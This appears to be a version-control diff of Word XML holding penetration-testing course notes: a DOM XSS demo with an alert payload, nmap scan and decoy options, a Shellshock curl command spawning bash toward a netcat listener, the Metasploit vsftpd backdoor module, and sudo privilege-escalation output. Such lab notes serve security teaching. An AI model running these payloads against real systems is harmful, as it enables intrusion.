+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>queryString</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>const</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> name = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urlParams.get</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>('name')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>document.write</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">('&lt;h1&gt; Hello, ' + name + </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>'!&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>/h1&gt;');</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;/head&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;body&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">  &lt;div&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   &lt;h1&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DOMed</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> page&lt;/h1&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> &lt;/body&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;html&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Visit:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>``</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>http://192.168.1.111/1.html?name=Dheeraj</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Hello Dheeraj</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Payload:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````````</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>````</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>http://192.168.1.111/1.html?name=&lt;script&gt;alert(1)&lt;/script</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4920,6 +8909,7 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">

--- a/1.nmap.docx
+++ b/1.nmap.docx
@@ -60,13 +60,8 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">[ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>X.X.X.X ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>[ X.X.X.X ]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -78,13 +73,8 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">[ 80/TCP -STATE- </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>HTTP ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>[ 80/TCP -STATE- HTTP ]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -250,21 +240,8 @@
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>7 :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> echo [ICMP/IGMP</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>] :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ping</w:t>
+      <w:r>
+        <w:t>7 : echo [ICMP/IGMP] : ping</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -308,37 +285,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>SYN,ACK</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>RST,PSH</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>FIN,URG</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>SYN,ACK,RST,PSH,FIN,URG</w:t>
+      </w:r>
     </w:p>
     <w:p/>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>3 way</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> handshake</w:t>
+      <w:r>
+        <w:t>3 way handshake</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1239,15 +1193,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">MAC Address: </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>84:A9:3E</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>:8A:7E:37 (Hewlett Packard)</w:t>
+        <w:t>MAC Address: 84:A9:3E:8A:7E:37 (Hewlett Packard)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1307,33 +1253,12 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">1) TCP Scan: [ Full Open </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Scan ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>-------------------------------Determines a system/port being alive by completing a 3-way handshake (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>SYN ;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> SYN+</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>ACK ;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ACK)</w:t>
+        <w:t>1) TCP Scan: [ Full Open Scan ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-------------------------------Determines a system/port being alive by completing a 3-way handshake (SYN ; SYN+ACK ; ACK)</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1434,27 +1359,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>T  [</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>TCP Scan]</w:t>
+      <w:r>
+        <w:t>T  [TCP Scan]</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">NOTE: By </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>default</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> NMAP scan 1000 ports as result.</w:t>
+        <w:t>NOTE: By default NMAP scan 1000 ports as result.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -1504,15 +1416,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">+ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Port:[</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>-p]</w:t>
+        <w:t>+ Port:[-p]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1736,23 +1640,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> 192.168.206.133 -p U:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>53,T</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>21-25,80</w:t>
+        <w:t xml:space="preserve"> 192.168.206.133 -p U:53,T21-25,80</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1992,43 +1880,23 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">-s [ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Scan ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">-T [ TCP </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Scan ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">-p [ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>port ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">-v [ </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>verbose ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>-s [ Scan ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-T [ TCP Scan ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-p [ port ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>-v [ verbose ]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -2040,13 +1908,8 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> [ very </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>verbose ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> [ very verbose ]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:proofErr w:type="spellStart"/>
@@ -2098,15 +1961,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Starting Nmap 7.70 </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>( https://nmap.org</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> ) at 2022-02-05 11:46 IST</w:t>
+        <w:t>Starting Nmap 7.70 ( https://nmap.org ) at 2022-02-05 11:46 IST</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2139,15 +1994,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>open  http</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>-proxy</w:t>
+        <w:t xml:space="preserve"> open  http-proxy</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2204,13 +2051,8 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">--reason [ reason of port/service </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>state ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>--reason [ reason of port/service state ]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -2290,15 +2132,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>-mac-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>prefixes :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Contain MAC prefix to detect manufacturer</w:t>
+        <w:t>-mac-prefixes : Contain MAC prefix to detect manufacturer</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2310,14 +2144,9 @@
       <w:r>
         <w:t>-protocols</w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:tab/>
-        <w:t xml:space="preserve">  :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Contain protocol and port related info</w:t>
+        <w:t xml:space="preserve">  : Contain protocol and port related info</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -2393,13 +2222,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">2) SYN Scan: [ Half Open </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Scan ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>2) SYN Scan: [ Half Open Scan ]</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -2744,15 +2568,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Type: RCE [ Remote Code </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Execution ]</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Remote</w:t>
+        <w:t>Type: RCE [ Remote Code Execution ] Remote</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2761,12 +2577,10 @@
         <w:t>/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>cgi</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>-bin/status</w:t>
       </w:r>
@@ -3114,18 +2928,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">we took access through vulnerable web and start </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">listening  </w:t>
+        <w:t xml:space="preserve">we took access through vulnerable web and start listening  </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>netcat</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> on </w:t>
       </w:r>
@@ -3150,23 +2959,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">curl -A '() </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>{ :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>; }; echo; /bin/bash -c "</w:t>
+        <w:t>curl -A '() { :; }; echo; /bin/bash -c "</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -3222,13 +3015,8 @@
         <w:t>nd</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>terminal :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> terminal :</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3623,15 +3411,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">2. Main </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Components::</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>Modules</w:t>
+        <w:t>2. Main Components::Modules</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3684,15 +3464,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"> Encoders: Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them. Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Thus</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> encoders can have a limited success rate as antivirus solutions can perform additional checks.</w:t>
+        <w:t xml:space="preserve"> Encoders: Encoders will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them. Signature-based antivirus and security solutions have a database of known threats. They detect threats by comparing suspicious files to this database and raise an alert if there is a match. Thus encoders can have a limited success rate as antivirus solutions can perform additional checks.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4214,15 +3986,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve"># Example </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>output:#</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> User </w:t>
+        <w:t xml:space="preserve"># Example output:# User </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4235,26 +3999,14 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">#  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>root) NOPASSWD: /</w:t>
+        <w:t xml:space="preserve">#     </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(root) NOPASSWD: /</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4281,26 +4033,14 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">#  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>root) NOPASSWD: /</w:t>
+        <w:t xml:space="preserve">#     </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(root) NOPASSWD: /</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -4448,7 +4188,6 @@
         <w:t xml:space="preserve">; </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4457,7 +4196,6 @@
         <w:t>os.system</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4839,7 +4577,6 @@
         <w:t xml:space="preserve"> -&gt; $HOME_NET 21 (</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -4853,15 +4590,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>;...</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>;...)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5057,12 +4786,10 @@
         <w:t xml:space="preserve">Wireshark Analysis: Run a Wireshark capture on your Kali interface (eth0 or similar) during the second scan. Apply the filter </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:t>tcp.port</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> == 53. You should see that your scan packets are originating from port 53 on your machine.</w:t>
       </w:r>
@@ -5257,23 +4984,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> -D 192.168.56.30,192.168.56.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>40,x</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>.x.x.x 192.168.56.20</w:t>
+        <w:t xml:space="preserve"> -D 192.168.56.30,192.168.56.40,x.x.x.x 192.168.56.20</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5315,23 +5026,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> -D </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>ME,RND</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>:10 192.168.56.20</w:t>
+        <w:t xml:space="preserve"> -D ME,RND:10 192.168.56.20</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5834,17 +5529,10 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">--min-parallelism </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">10  </w:t>
+        <w:t xml:space="preserve">--min-parallelism 10  </w:t>
       </w:r>
       <w:r>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
         <w:t>: 10 Parallel tasks</w:t>
       </w:r>
     </w:p>
@@ -6135,23 +5823,7 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
-        <w:t>/ftp/vsftpd_234_</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>backdoor  2011</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">-07-03       </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>excellent  VSFTPD</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> v2.3.4 Backdoor Command Execution</w:t>
+        <w:t>/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -6236,15 +5908,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   Name   Current </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Setting  Required</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">  Description</w:t>
+        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6254,28 +5918,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   RHOST                   </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>yes</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">       The target address</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">   RPORT  21               </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>yes</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">       The target port</w:t>
+        <w:t xml:space="preserve">   RHOST                   yes       The target address</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">   RPORT  21               yes       The target port</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -6286,13 +5934,8 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Id  Name</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">   Id  Name</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -6594,15 +6237,7 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   Name   Current </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>Setting  Required</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">  Description</w:t>
+        <w:t xml:space="preserve">   Name   Current Setting  Required  Description</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6612,36 +6247,12 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>RHOST  192.168.127.154</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">  </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>yes</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
